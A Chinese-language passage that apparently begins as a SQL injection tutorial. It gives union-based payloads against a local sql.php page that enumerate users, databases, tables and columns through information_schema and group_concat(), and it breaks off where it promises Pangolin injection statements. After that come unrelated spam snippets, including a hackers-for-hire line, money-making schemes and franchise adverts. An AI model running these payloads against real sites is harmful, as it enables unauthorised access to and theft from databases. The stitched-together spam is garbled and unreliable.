利用Information_schema系统库来注入,配合使用group_concat()函数,group_concat()功能强大,而且能够绕过limit限制
http://127.0.0.1/sql.php?id=1 union select 0,0,0 字段为 3
http://127.0.0.1/sql.php?id=1 and 1=2 union select count(*),1,1 from mysql.user 统计数据库中又多少个用户
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata 测试过程中只有 root权限或者 全局权限才能爆出所有数据库 普通用户不能爆出所有用户
这样就把mysql服务器所有数据库名字显示出来了
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374
这样就能把 test 数据库中的 所有表显示出来了。 其中 0x74657374 为 test 的 hex 值
http://127.0.0.1/sql.php?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646D696E
这样就把admin表中所有的字段名 显示出来了。
这样注入手法很灵活的。突破了 limit 限制了。
来看下 穿山甲的注入语句
一年前我推荐了一个骗子挂机项目:赚钱啦,停止现在已跨越1.6万点击率,没想到一年后,他们依然存在,做了新的平台叫“imoney”,和以前一样,免费用户最多一天只能提现0.5米,秒到支付宝,造成很靠谱的...
废话不多说,直接看我的秒杀战绩 像这种一元秒杀我参与过很多回,由于订单太多,就不一一列出来了。下面我就教大家怎样来一元秒杀。 目前京东秒杀一天有12个整点秒杀,一般价美物廉的物品基本放在工作日...
专业黑客先做事后付款 继去年8月一审之后,二十五号,十三届全国人大常委会第十一次会议,婚姻家庭法民法典第二审草案保留了第一稿的许多亮点。疾病不再是禁止结婚,不再是增加离婚冷静期,不再保留计划生...
《隐秘的角落》原著小说小说集叫《坏小孩》,是一本主题少见的犯罪小说,即然是犯罪小说,那麼毫无疑问便会各种各样案子的产生,也会出现最终反派角色大boss,电视连续剧第一集开场便是一场凶杀案,看着不寒而栗...
此刻有不少加盟商都在问我爱吃零食加盟项目怎么样,各人都想要加盟到个中去,其实选择加盟我爱吃零食长短常不错的一个选择,因为我爱吃零食加盟项目创立多年,品牌形象早就已经深入人心,深受宽大消费者的喜爱与追捧...
把小孩子培养成优秀的人,需要父母在方方面面尽心打造。时下在中国很多父母盲目给孩子购买电子益智玩具,其实作为儿童玩具里的巨无霸的儿童自行车在国外更为流行,因为儿童自行车在智力开发的同时更能促进孩子的肢体...